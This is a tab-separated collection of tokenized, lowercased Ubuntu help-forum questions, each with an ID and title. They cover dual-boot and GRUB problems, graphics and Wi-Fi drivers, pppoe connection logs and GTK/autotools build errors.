397115	subdownloader error : unable to download subtitle	( blablabla = a name of a movie ) the subdownloader gives me this error : unable to download subtitle blablabla.srt . if somebody knows please answer with simple english since i 'm new to ubuntu and new to english . i am using ubuntu 13.10 64 bit . i hope to find a solution .
397116	why does n't my optical drive read dvds nor bds anymore ? only cds	i have installed ubuntu through a cd . now my optical drive does n't real dvds nor bds anymore . i 'm new to ubuntu . do n't know many things . just the basics . is there a way to either configure it ? should i re-install the drivers ? if so , where do i find them and what is the process for reinstalling them ? this is the hardware : sstcorp dvdwbd sn 406ab i only find help regarding windows . and i ca n't reinstall windows to solve the problem because of the same issue : ca n't read dvd thanks
397121	ubuntu crashes ( not windows , and i am a dual user , can you help ?	i have an acer aspire 5715z and i have the 12.04 ubuntu version . i am a dual user windows and ubuntu . after a short while , and most particularly when i browse , listen to the radio , or watch you tube , or am in facebook and watch audiovisual elements , the system crashes . it does get very hot - i changed the battery recently , so this is not due to an old battery , nor does it happen with windows . can you help me ? thank you very much !
397122	can i install ubuntu on this ssd ?	i reseted my windows 8 notebook ( lenovo u410 ) and reinstalled . now w8 is installed on my c drive and nothing is on my 24 gb ssd . that mean that ssd is free and i can use it for ubuntu install ? i do n't wan na mess my notebook and i want to dualboot ubuntu and windows . thanks for answering .
397125	how can i disable neogrub bootloader on console ?	i want to dualboot window 8 pro and ubuntu.it ca n't boot ubuntu in first time , then i use easybcd to change window boot manager to boot ubuntu.i add entries and install neogrub.when i restart on windows boot manager screen it has only `` nerogrub bootloader '' that i can choose.window 8 is disappeared , then i use ubuntu `` trying ubuntu mode '' and use boot-repair to repair grub.it 's work and return this : http : //paste.ubuntu.com/6655010/ , now i can boot to my ubuntu , but window can't.on grub boot list i have ubuntu , with linux 3.5.0-23-generic ubuntu , with linux 3.5.0-23-generic ( recover mode ) windows uefi bkpbootmgfw.efi window boot uefi loader efi/efi/boot/bkpbootx64.efi window 8 ( loader ) ( on /dev/sda4 ) when i choose `` windows uefi bkpbootmgfw.efi '' or `` window boot uefi loader '' , it 's go to window boot manager screen and has only one choice `` neogrub bootloader '' .when i choose it 's show error like window failed to start . a recent hardware or software change might be cause . to fix the problem : . . more details . file : \nst\neogrub.mbr status : 0xc000000f info : the application or operating system could n't be loaded ... help me please ! i stuck with this problem for a week . thankyou very much for all answer , sorry for my weak skill grammar . tell me if you want more information or do n't understand my question .
397129	synaptic touchpad disabled after boot	every time i restart ubuntu the touch pad is set to disabled . i have to manually trigger it via the keyboard short cut ( fn + f7 ) . how can i set it so it is automatically enabled ?
397130	bluetooth adaptop not found on dell inspiron 15 3521	no bluetooth adaptor found in dell inspiron 15 3521 after booting ubuntu 13.10 . it has ubuntu 12.04 lts bluetooth worked fine . but now wifi works but bluetooth does not work . i install bluetooth manager from ubuntu software center . please show how to fix my problem..
397131	ca n't get proper screen resolution in ubuntu . may be because of graphic card drivers	i have ubuntu 12.04 installed along with windows 8 on dell inspiron n5010 . everything was fine until i installed ati graphic drivers in windows 8 . now i do not get proper resolution in ubuntu . output of xrandr is as below . please help , it 's very frustrating as i am new to ubuntu . xrandr failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 57.0
397135	how to make a particular display monitor default for all the tasks except a few while using multiple monitors ?	i have a laptop connected to another monitor via the hdmi cable . i program on my laptop and wish to make the monitor as the primary display for all the other tasks . for example , while programming on my laptop , when i run my code , then all the windows for this running program should by default open on my monitor . how may i achieve the same ? i am using ubuntu 12.04 in case it matters .
397138	external firewire hard drive	i have a 320gb external hard drive that has both usb and firewire . when i try and fdisk -l using the firewire connection i get this result . disk /dev/sdc : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table adam @ ubuntu-gnome-x64 : ~ $ and ca n't use the drive , however when i use usb i get this result disk /dev/sdc : 320.1 gb , 320072932864 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142447 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d860d device boot start end blocks id system /dev/sdc1 2048 625141759 312569856 83 linux and the drive is fully usable . i would prefer to use the firewire connection as i boot ubuntu from an external usb drive and this would free a usb port .
397139	ati hd 8330 driver on ubuntu 13.10 64-bit	does amd/ati 's official driver ( downloaded directly from amd 's website ) work better than the built-in fglrx drivers in ubuntu 13.10 64-bit ? i am using the built-in driver ( fglrx ) on hp pavilion ( apu a4 , quad core , ati hd 8330 , 8 gb ram ) and the display is sluggish . has anyone tried the driver from amd 's site ?
397140	how do i install video codec on ubuntu 12.04 ?	on my machine mp3 files are playing perfectly . i want to downlaod video codec for playing populer types of format ! like mp4 3gp mkv flv avi ..etc . is there any way to play those files without installing ubuntu restricted extras ? i wan na download just video codec and nothing else .
397144	black blinking screen on ubuntu 12.04	so i tried installing ubuntu 12.04 using windows installer it took me 6 hours to install it and when i boot it it shows back blinking desktop i tried pressing ctrl+alt+f2 , but nothing ... then i tried replacing with nomodeset big nothing ... help
397148	how do i install vuze 5.2 ?	currently vuze 4.3.0.6 is installed from apt-get . i want to update to the latest vuze version . can i download a jar ? i hesitate to manually install software . current version is 5.2 on vuze.com -- quite a leap . if i install from the website , what impact will this have on the system ? i would rather use apt-get to install software .
397150	how to grant standard users access to disk partitions in ubuntu 13.10 ?	i have a partition that i need standard users ( not administrators ) to have read/write access to.how can i make it so that standard users can read/write to this partition ?
397153	griffith not getting updated anymore ?	i was wondering if the movie database applocation griffith is n't getting updates anymore ? reason i ask , is that the version you get from the official repo 's is n't working . i have to download an old validators.py file and use that , instead of the one from the program to get it to work . so is the project dead ? or is updates just a bit slow ? cheers , dan
397154	black screen when istalling nvidia drivers	i have just recently installed ubuntu 13.10 and decided to install the necessary nvidia driver : sudo apt-get install nvidia-current then i reboot and find to have the black screen . i went into the terminal with control-alt-f1 and executed the following and rebooted : sudo apt-get remove nvidia-current but i still get the black screen . how can i fix this ?
397158	unity launcher shown over dota 2 in fullscreen	every time i launch dota 2 on my pc running 13.10 it looks like this : the side and top bars do n't go away even though the game is in full-screen . i only have this problem with dota 2 all other games work fine in full-screen . i have tried going into the settings and enabling the shortcut that forces fullscreen mode but nothing happens when i press the shortcut . is there a way to fix this or force ubuntu into fullscreen mode ? this problem is only with dota 2 and not other fullscreen apps/games .
397162	gnome-screensaver still trying to load after installing xscreensaver ?	after installing xscreensaver , as detailed here , including removing gnome-screensaver , it still appears in the logs ( syslog ) that something is trying to launch gnome-screensaver : gnome-session [ 2563 ] : warning : could not launch application 'gnome- screensaver.desktop ' : unable to start application : failed to execute child process `` gnome-screensaver '' ( no such fsuch file or directory ) how can i stop this ?
397164	ubuntu install freezing	when i put my disk with ubuntu in , it freezes the second time it asks to select a language ( the page after i select to install ubuntu . ) i ran the disk check and nothing was faulty . i have 6gb ram , 4.64 available i have 600gb hard drive with 596 available . computer processor is amd anthlon ( tm ) ii x4 620 processor , 2600 mhz , 4 cores so , it seems my computer should definitely be able to run ubuntu . and the disk is not flawed . what issue am i having ?
397171	fix my partitions ?	these are my partitions . sda1 is boot sda2 has an unused ubuntu 13.10 on it that i installed to fix my grub2 i do n't know what the unallocated space is from i do n't know about sda4 either sda5 has my primary ubuntu 13.10 installation sda3 has my swap on it my end goal is to have windows 7 and ubuntu 13.10 dual booted . i want to get my primary installation of ubuntu ( preserving all of my applications and personal data ) to be the only partition ( excluding the swap and boot obviously ) and then install windows on afterwards . i do n't have a storage device big enough to just store the necessary data and format everything , so how can i fix this ?
397172	ubuntu server 12.0.4 lts can not load after fresh install but gives a blinking cursor screen	after installing ubuntu server 12.0.4 lts from a booteble usb created using universal-usb-installer-1.9.5.1.exe i removed the usb to allow it to boot from the disk . but it only booted to a black screen with a blinking cursor . several reboots have not helped . what should i do ? i am new to linux commands so give me clear step by step guidance . i do have another bootable slax usb . how can i use this to get to the hard disk ?
397174	vuze search results empty or null	a search for `` ubuntu '' , or for anything , never turns up results : diagnostics : pausing downloads before performing test ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... tcp/web100 network diagnostic tool v3.6.2b ** starting test 1 of 1 ** connecting to 'ndt.iupui.donar.measurement-lab.org ' [ ndt.iupui.donar.measurement-lab.org/64.9.225.141 ] to run test connected to : ndt.iupui.donar.measurement-lab.org -- using ipv4 address checking for middleboxes . . . . . . . . . . . . . . . . . . done . checking for firewalls . . . . . . . . . . . . . . . . . . . done . running 10s outbound test ( client-to-server [ c2s ] ) . . . . . 535.0kb/s running 10s inbound test ( server-to-client [ s2c ] ) . . . . . . 8.90mb/s your workstation is connected to a cable/dsl modem information : other network traffic is congesting the link completed : up=65.3 kb/s , down=1.06 mb/s the version of vuze on 12.04 lts came configured in such a way that it would search various networks . i 'm unable to find a reference explaining how to add those networks ( if that 's the term ) . how do i add a site or network to vuze ? opening a torrent file , set to open with vuze , gives a new interface :
397177	extend live usb overlay partition	i am using a lubuntu live usb as kind of mobile or rescue system . it 's installed on a ~4gb stick . now that i wanted to update the software ( aptitude full-upgrade ) , i ran into some `` disk full '' errors . deleting the apt package cache , i was still able to finish the update . but df -h tells me , that the root fs is 95 % full . yet the usb stick itself is only 50 % full . it seems to use overlayfs and not some traditional partition mounted with fstab setup . any ideas how i can extend the space used ?
397178	pppoe : how to set fixed calling number	i 'm facing issue with pppoe connection , error logs : dec 29 15:50:20 rahul-home pppd [ 4141 ] : ppp session is 1769 dec 29 15:50:20 rahul-home pppd [ 4141 ] : connected to 00:27:0e:14 : d1:04 via interface eth0 dec 29 15:50:20 rahul-home pppd [ 4141 ] : using interface ppp0 dec 29 15:50:20 rahul-home pppd [ 4141 ] : connect : ppp0 < -- > eth0 dec 29 15:50:20 rahul-home networkmanager [ 1131 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... dec 29 15:50:20 rahul-home networkmanager [ 1131 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) dec 29 15:50:20 rahul-home networkmanager [ 1131 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . dec 29 15:50:20 rahul-home pppd [ 4141 ] : chap authentication failed : bad username or password dec 29 15:50:20 rahul-home pppd [ 4141 ] : chap authentication failed dec 29 15:50:20 rahul-home pppd [ 4141 ] : connection terminated . dec 29 15:50:20 rahul-home networkmanager [ 1131 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) dec 29 15:50:20 rahul-home avahi-daemon [ 859 ] : withdrawing workstation service for ppp0 . dec 29 15:50:22 rahul-home pppd [ 4141 ] : terminating on signal 15 dec 29 15:50:22 rahul-home pppd [ 4141 ] : exit . success log dec 29 15:50:24 rahul-home pppd [ 4189 ] : ppp session is 22450 dec 29 15:50:24 rahul-home pppd [ 4189 ] : connected to 00:07 : e9 : a5 : a8:85 via interface eth0 dec 29 15:50:24 rahul-home pppd [ 4189 ] : using interface ppp0 dec 29 15:50:24 rahul-home pppd [ 4189 ] : connect : ppp0 < -- > eth0 dec 29 15:50:24 rahul-home networkmanager [ 1131 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... dec 29 15:50:24 rahul-home networkmanager [ 1131 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) dec 29 15:50:24 rahul-home networkmanager [ 1131 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . dec 29 15:50:24 rahul-home pppd [ 4189 ] : chap authentication succeeded : welcome . dec 29 15:50:24 rahul-home pppd [ 4189 ] : chap authentication succeeded dec 29 15:50:24 rahul-home pppd [ 4189 ] : peer from calling number 00:07 : e9 : a5 : a8:85 authorized dec 29 15:50:24 rahul-home pppd [ 4189 ] : local ip address xx.xx.xx.xx dec 29 15:50:24 rahul-home pppd [ 4189 ] : remote ip address 172.31.29.1 dec 29 15:50:24 rahul-home pppd [ 4189 ] : primary dns address xx.xx.xx.xx dec 29 15:50:24 rahul-home pppd [ 4189 ] : secondary dns address xx.xx.xx.xx my observation i have tested with n number of attempt , but i 've notice that dialer get connected when it using peer calling number 00:07 : e9 : a5 : a8:85 , but i 'm unable to fix this . with help of man pppd , i 've tried following option in /etc/ppp/options allow-number 00:07 : e9 : a5 : a8:85 # tested showing not authorized remotenumber 00:07 : e9 : a5 : a8:85 # tested but not working temporary solution # ! /bin/bash # retry pppoe until get connected rndc stop interval=2 n=0 pppstats & & { echo `` internet is working '' ; exit 1 ; } until nc -vzw1 titanic 80 do poff -a || pon dsl-provider sleep $ interval ( ( n++ ) ) done echo `` dialer connected after total retry : $ n '' plog /etc/init.d/bind9 start specs distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy pppd version 2.4.5 question how do i set fix calling number in pppoe ?
397181	open text file and dispaly in gtk+2 and display	please tell how text file can be read and the data can be then manipulated in gtk+2 c language . i have tried to compile a code but the problem is that only one line is displayed from the text file code is given as below # include < gtk/gtk.h > int main ( int argc , char **argv ) { /*read text from file*/ file *fp ; char string [ 128 ] ; if ( ( fp = fopen ( `` file.txt '' , `` r '' ) ) ==null ) { printf ( `` can not open file.\n '' ) ; } while ( ! feof ( fp ) ) { fgets ( string , 126 , fp ) ; } fclose ( fp ) ; /*create gtk widgets*/ gtkwidget *window ; gtkwidget *button ; //initialise gtk gtk_init ( & argc , & argv ) ; window = gtk_window_new ( gtk_window_toplevel ) ; button = gtk_button_new_with_label ( string ) ; //pack button inside window gtk_container_add ( gtk_container ( window ) , button ) ; //display widgets gtk_widget_show ( button ) ; gtk_widget_show ( window ) ; gtk_main ( ) ; return 0 ; }
397183	reassigning the left alt key to something else in 13.10 . ref cs2 clone tool under wine	been trying to deal with this for a couple of days now . i 'm using ubuntu 13.10 with wine and cs2 . i need to use the cs2 clone tool but i can not because the lft-alt key is used for moving a window in ubuntu . i have gone to system settings = > hardware= > keyboard= > shortcuts= > windows and tried various combinations for the window move shortcut but nothing seems to change . am i missing something ? i 'm new to ubuntu , mainly used mint , and am using it to help a mate how is new to linux but needs ubuntu for a particular job . he also would need cs2 but this key binding issue has stopped his interest in linux . i 'd like to change his perception ! cheers , rick . uk . edit . found the answer by using gnome-tweak_tools . thanks .
397184	select a jvm ( java virtual machine ) on a per program basis	i recently had to select openjdk7 as the default java implementation on my ubuntu 12.04 . i had to do this because some eclipse plugins required java 7 in order to work correctly . i would like to know if there is a way to select openjdk7 as the virtual machine to use on a per-program basis : i would like eclipse to use openjdk7 while leaving the system as it was before . i know that for eclipse you can do this modifying some .ini configuration files , but i was wondering if there is a way to do this for other programs as well , that is independent of the implementation .
397185	upgrading lxc version	trying to upgrade the lxc version from 0.7.5 to 0.8.0 . executed following command : apt-get install lxc but it didnt work the package is still 0.7.5. apt-get install lxc=0.8.0 gives error saying e : version '0.8.0 ' for 'lxc ' was not found how to upgrade it to next version ? please help ! thanks !
397186	lenovo thinkpad t420s reducing power usage	i found this tutorial to reduce power usage on a thinkpad t420s for ubuntu 11.10 . would it make sense to change grub grub_cmdline_linux_default= '' i915.i915_enable_rc6=1 pcie_aspm=force acpi=noirq quiet splash '' on ubuntu 13.10 ?
397187	how to converting hex jpg to bin jpg	i have jpeg files , they are was saved in db in hex format . i import them into txt files , but files filled like this : 0x0000000c6a5020200d0a870a00000014667479706a703220000000006a7032200000002d6a7032680000001669686472000000580000018c0003070700000000000f636f6c7201000000000010000000006a703263ff4fff51002f00000000018c0000005800000000000000000000018c0000005800000000000000000003070101070101070101ff5c000541682bff52000c00000001010504040000ff64000b00014c52545f312e38ff90000a0000000 how converting this files to normal jpg for view image ? ?
397190	usb drive are not mounted automatically	my usb drive is not mounted automatically but it has detected through lsusb . i also used dconf-editor but it is not working . every time i have to mount manually through disk utility .
397191	unable to install grub in /dev/sda	i have tried multiple times to install ubuntu 13.10 amd64bit via cd and usb but it always fails in the end and gives the `` unable to install grub in /dev/sda '' error.i tried 32 bit and still have the same problem . i have a custom built pc running on asus p8z68 mother board . i am running windows 8 64bit and have 3 hard disks and one ssd . i want to install ubuntu alongside as dual boot . i never had problems before i moved to windows 8 and this new pc . i had let ubuntu installer to select the disk for installation . after reading the forums , i tried ueifbut when i do that , the installer does not show windows 8 as the operating system on the pc and the only option is to install ubuntu . i ran the boot-repair based on some suggestions and got the below output http : //paste.ubuntu.com/6655751/ boot-repair showned me the message below but i am not sure what is the impact to windows 8 if i do that and not sure if this will resolve my issue . `` sfs detected . you may want to retry after converting windows dynamic partitioning ( sfs partitions ) to a basic disk '' i am a complete noob and need your advice on what i need to do to make ubuntu work on my pc . many thanks .
397194	when trying to load a game ( heroes3 ) i get this error - xf86dgagetvideo : failed to mmap /dev/mem ( invalid argument ) . what could be wrong here ?	so for installation i used this tutorial : http : //www.vasiauvi.org/2011/06/install-heroes-of-might-and-magic-3-on.html and everything worked perfectly fine ( well , except that i could n't create a directory to mount a cd in `` /mnt/fakecd '' , it said that i do n't have enough permissions , so i created a folder in /home/user/downloads/test and mounted in from there ) , until i wanted to launch a game where it showed this error : '' xf86dgagetvideo : failed to mmap /dev/mem ( invalid argument ) '' what could be wrong there ? i tried to google for this but only founded some old thread in spanish forum..with no help . maybe someone knows ?
397196	dual booting ubuntu and windows 8	as far as i have heard , dual booting ( ubuntu and windows ) in uefi is n't very clean , and hence people prefer csm when doing so . but , in case my laptop has windows pre-installed in uefi , i need to reinstall it to get it in csm . now , my laptop 's boot menu has an option of uefi and csm . what could this option mean ? does it mean i can dual boot without any hassles ?
397199	ghosts haunt my unity dash ! videos and animated images appear through the overlay !	q1 . there 's this image ( from my last google chrome session ) that 's appearing in my dash . there 's one different image appearing in shortcut overlay ( on `` press-hold '' super button ) . this is un-intentional , so first i 'd like to know a way to remove it . logging out and back in works , but that does n't seem to solve it permanently - the problem reproduces . here 's a snapshot : ( ghost of facebook page ) ( please note the ghost of a facebook page within the dash overlay area . the only window in the background is of firefox with a blank page . ) ..here 's gnost of nautilus , ..and this is the ghost of system monitor q2 . dash 's been behaving weird lately with videos or animations playing in the background . the video/animated-image flash through the dash . ( the problem persists through sessions . ) these two snaps below should explain the problem visually : < 1 > ( note the youtube video is being displayed through the dash . ) < 2 > ( and here 's the same with a video being played with vlc . ) how to fix that ? or is this normal , or a bug ?
397203	changing esc to alt-f4 while running sh script ?	is there anyway to change esc to alt-f4 while running a shell script that is run by advanced launcher ( xbmc ) it then runs google-chrome in kiosk mode ? but since i am using a controller with limited buttons i need to change esc to alt-f4 while in chrome , since there is no way of exiting kiosk mode . this is my shell script # ! /bin/bash google-chrome -- kiosk http : //***********
397208	authenticating windows users to ubuntu server	i am new to ubuntu and i installed ubuntu server 12.04 lts version . so now the question is whats next ... : ) i selected the option of installing sshserver , dns , etc during the installation . now i have a command prompt ... where to go from there ? basically i have to authenticate windows users and let them use a centralized file systems among other this they wan na do ... .please help ?
397209	prevent the installation of a specific kernel version	having had major problems with kernel 3.11.0-14 ( wlan , desktop login , alsa crashes ) i decided to back out -14 , returning to 3.11.0-12 . > > all < < problems then disapeared . now i want to block 3.11.0-14 from automatically reinstalling but i am prepared to accept higher versions than -14 in future packages updates . anyone have ideas on how to block -14 from reinstalling ?
397214	how do i access zpanel ( control panel ) files ?	i 've bought a vps and installed ubuntu 12.04 on it . to control my domains , i 've installed zpanel x ( 10.1.0 ) ( controlpanel ) and , while this went after 4 tries , perfectly , i can not access the zpanel files themselves . while i can create a ftp account within zpanel , i can only access the /public_html/ folder , even though i set root/master access to my ftp account , i ca n't access the folder '/panel/ ' , where the zpanel files are stored . you perhaps ask why ? i need to configure and edit some zpanel files . i hope someone knows , thanks !
397215	dvd drive very slow	my dvd drive is very slow nowadays . i havent used it in a while so at first i didnt notice . but since i got a rasberyypi setup as a mediacenter i wanted to rip my dvd 's . the problem is that it only has a speed of around 1.8x i do not really know what to do . how can i fix this and bring it up to normal speeds again ( i think it was at least 16x ) .
397216	ubuntu download for beagleboard-xm	can you please tell me which version of ubuntu is best for beagleboard-xm and where can i download it ?
397217	importing gufw rules ?	is there an easy way to import ready rules for uncomplicated firewall ? like ready in and out rules with ips and everything .
397221	ubuntu 12.10 sleep on android mini pc	a question i wanted to ask was how do i get the sleep modes and shutdown modes working on the android mini pc ? i know its possible to boot but shutting down safely seems to be more complicated than i thought . i thought that maybe a shut down would work but seeing that there is now possible way to turn it back on . this is more foe someone in the hardware department but is there away to add like a power button or something ? this really has me confused and i thought one of you guys could help .
397222	installation ubuntu 12.04 lts 64 bit	how shall i follow the installation process i had tried by my usb pendrive but was not success ful even i tried to install by making my usb a bootable even then it was not proceeded ... . later tried a software called multi bootable usb creator used to install many os in the form of .iso file but even this doesn.t work i have downloaded 64bit ubuntu 12.04 lts .. kindly suggest need someones help .. . thanking you !
397223	how to recover after an accidental reboot during upgrade ?	i was updating my ubuntu 13.04 to 13.10 and during the work of the update program there was an electricity blackout in my house . when i tried to open the system the recovery console + some lines saying that sth . might be wrong with the filesystem opened and it keeps appearing even after pressing ctrl+d ( which should let ubuntu load normally ) . how to revert update changes or fix the system from the console ? can anyone help me ? the console also says that the filesystem is 'read-only ' when i try to use apt-get commands .
397229	forgot password but passwd will not work	my brother changed my password on ubuntu and forgot it but command passwd on recovery will not work and i can not buy disks or usb 's any help ? maybe a program or kon boot for linux : s help ! plz !
397231	change default file manager for chromium	i am using xubuntu 13.10 and i have installed dolphin and set it as the preferred file manager in the xfce settings manager . however , when i try to upload photos using chromium and facebook , it appears to open thunar . how can i make chromium use dolphin for this ?
397233	grub installed in pendrive , how to boot from hdd ?	i 've installed ubuntu into a pendrive and now i ca n't boot into windows without the pen plugged in . it seems that this question ( i need my pendrive to boot into ubuntu , how to correct this and boot from the hdd ? ) has already the solution , but i need help finding out what partition i should use . my partitions looks like this : /dev/sda1 : label= '' system '' uuid= '' f290e90290e8cde3 '' type= '' ntfs '' /dev/sda2 : label= '' ti30925800a '' uuid= '' de6e0ddf6e0db0f7 '' type= '' ntfs '' /dev/sda4 : label= '' hddrecovery '' uuid= '' 0ca84eb2a84e9a5a '' type= '' ntfs '' /dev/sdb1 : uuid= '' 605e653b5e650adc '' type= '' ntfs '' /dev/sdc1 : uuid= '' 7cba5674-27f1-474d-9678-896e46d84c5e '' type= '' ext4 '' /dev/sdc5 : uuid= '' 9500fb35-af38-4272-8475-74a9ee465329 '' type= '' swap '' sda1/sda2/sda3 have windows installed , sdb1 it 's probably the the 32g ssd disk that helps windows hibernation times , and sdc1 and sdc5 it 's probably the ubuntu pen should i use the dev/sda1 , which is probably the window boot partition ?
397234	why does the cursor freeze in terminals ?	it 's a pretty dumb question i 've noticed that whenever i open any terminal , the cursor blinks about 9 or 10 times and then freezes is there a particular reason for this ? what 's the idea ?
397239	wifi not detected on hp envy touch	i just bought a new envy touch from hp with windows 8.1 ... and really did n't like windows 8.1 all that much so i tried installing ubuntu 13.1 on it . 13.1 would n't even run actually past the language screen so i tried 12.04 lts which installed fine . the only problem i encountered was it could n't connect to wifi because its not detecting the wifi card . any help much appreciated ill post my wifi adapter below thanks . realtek pcie gbe family controller realtek rtl8188ee 802.11bgn wi-fi adapter
397240	installing kubuntu on a dual boot computer	i am running ubuntu gnome 13.10 . the computer is a dual-boot machine , windows 7 and ubuntu gnome . the / partition has around 10gb free space . /home is on a separate partition . i want to try kubuntu . here are the questions : can this be done ? a triple boot machine booting either ubuntu gnome or kubuntu or windows 7 ? i will need to repartition the / partition and carve out some empty space ( around 6gb would be enough ? ) . can i do this while booted into ubuntu gnome ? how ? can both installations share /home partition ? in that case , will i need to tell kubuntu installer to mount /home but not format it , correct ?
397241	how to call python script from explorer right click	i have written a tool in python which i want to be able to launch from the right click of the folder in the file and folder explorer ... and i want to pass the folder i right click as argument to the python script ! !
397242	how to solve unity default font showing squares ?	using unity-teak-tool to change default font from ubuntu 11 , to helvetica is not working properly . i installed the fonts in /usr/share/fonts and they are all opentype . however , when i set default font to helvetica ( in any of the installed variants ) i only see squares/boxes ( i.e . âą ) . what can be wrong ? should i install the fonts differently ? do they have to be ttf instead ? i 'm in ubuntu 13.10 , by the way .
397244	laptop keyboard not working , how to enable wifi using usb keyboard ( or remap the laptops fn key to a key on the usb keyboard )	i 've been around the block with this several times and nothing seems to hardware unblock the wifi on this laptop . i am running ubuntu 10.04 lts . laptop is a medion md96350 . its built in keyboard is defective so i have to use a usb keyboard . the wifi worked fine until today , i returned home to find that my kids have been on the laptop and somehow disabled/hardware blocked the wifi . and i can not re-enable it . on the original built in keyboard , the switch is a key combo press ( fn+ an f key i ca n't remember - the keyboard has since been removed ) . there is a strip across the top of the base showing disc access status , battery indicator etc , power switch , then the wifi indicator and some media indicators which are also keys ( play , pause , prev . next . ) which all light up blue , and get 'bluer ' once 'pressed ' ( no physical button ) . the wifi indicator no longer lights up . i 'm unsure whether this is also a 'key ' , but nothing happens if it is 'pressed ' . wifi card info from sudo lspci -v 0a:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) subsystem : intel corporation device 1001 flags : bus master , fast devsel , latency 0 , irq 32 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ c8 ] power management version 2 capabilities : [ d0 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable+ capabilities : [ e0 ] express legacy endpoint , msi 00 capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 140 ] device serial number 85-83-c7-ff-ff-77-1b-00 kernel driver in use : iwl3945 kernel modules : iwl3945 sudo rfkill list 3 : phy2 : wireless lan soft blocked : no hard blocked : yes sudo ifconfig wlan4 up siocsifflags : unknown error 132 the driver is iwl3945 , which is associated . i have tried removing it and reinstating it to no effect . i have tried various other things to no effect . when i had windows installed , i could raise and switch off the card via windows with no problems . i have since removed windows , and do not wish to reinstall it just to raise the wifi card every time it is switched off in ubuntu . bios has the options to have the hardware switched off on boot , or in the state it was during the last shutdown . there is no option to have it switched on at boot . so , my question is , since there appears to be no resolution for this directly , as in having ubuntu being able to hardware unblock it , is there a way to map the fn key the laptops ' built in keyboard had , to my usb keyboard , and how . or is there a way to access the built in media `` buttons '' ( the strip across the top of the laptop ) to be able to have ubuntu recognise the wifi `` button '' ( if it is indeed a `` button '' ) ? thanks .
397245	many devices using 100 % power in powertop	in ubuntu 13.10 on my mac mini 4,1 the devices tab in powertop reports a bunch of pci devices using 100 % power : usage device name 0.3 % cpu use 100.0 % pci device : nvidia corporation device 0d9b 100.0 % pci device : nvidia corporation device 0d9b 100.0 % pci device : nvidia corporation mcp89 pci express bridge 100.0 % radio device : wl 100.0 % radio device : wl 100.0 % radio device : btusb 100.0 % pci device : nvidia corporation mcp89 high definition audio 100.0 % pci device : nvidia corporation mcp89 sata controller ( ahci mode ) 100.0 % pci device : texas instruments xio2213a/b/xio2221 ieee-1394b ohci controller 100.0 % pci device : broadcom corporation bcm43224 802.11a/b/g/n 100.0 % pci device : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie 100.0 % pci device : broadcom corporation bcm57765/57785 sdxc/mmc card reader 100.0 % pci device : nvidia corporation mcp89 [ geforce 320m ] 100.0 % pci device : nvidia corporation device 0d9a 100.0 % pci device : texas instruments xio2213a/b/xio2221 pci express to pci bridge [ the system 's running a lot hotter than it did in os x , and i assume it 's because of these devices . i 'm running the mac mini without a display , so i do n't really need the nvidia 320m or any of the wi-fi/bluetooth/audio devices using power . is there a way i can cut power to some of the devices in this list , since i do n't use them ?
397246	makefile:448 : *** missing separator . stop . error	i am trying to use make command to build but error occurs the tutorial i am following is click to open i am compiling a code using gtk+2 and c language hp @ ubuntu : ~/amhello $ autoreconf -- install configure.ac:2 : installing `./install-sh' configure.ac:2 : installing `./missing' src/makefile.am : installing `./depcomp' hp @ ubuntu : ~/amhello $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 configure : creating ./config.status config.status : creating makefile config.status : creating src/makefile config.status : creating config.h config.status : executing depfiles commands hp @ ubuntu : ~/amhello $ make make all-recursive make [ 1 ] : entering directory `/home/hp/amhello' making all in src make [ 2 ] : entering directory `/home/hp/amhello/src' makefile:448 : *** missing separator . stop . make [ 2 ] : leaving directory `/home/hp/amhello/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/hp/amhello' make : *** [ all ] error 2 this is the line number 448 of makefile ~/amhello % cat src/makefile.amz my code c is as below # include < config.h > # include < stdio.h > # include < gtk/gtk.h > void static call ( gtkwidget *widget , gpointer data ) { g_print ( `` % s \n '' , ( gchar* ) data ) ; } int main ( int agrc , char *agrv [ ] ) { gtk_init ( & agrc , & agrv ) ; gtkwidget *window , *button ; window=gtk_window_new ( gtk_window_toplevel ) ; g_signal_connect ( window , '' delete-event '' , g_callback ( gtk_main_quit ) , null ) ; gtk_window_set_title ( gtk_window ( window ) , '' one button '' ) ; button=gtk_button_new_with_label ( `` hello world '' ) ; g_signal_connect ( button 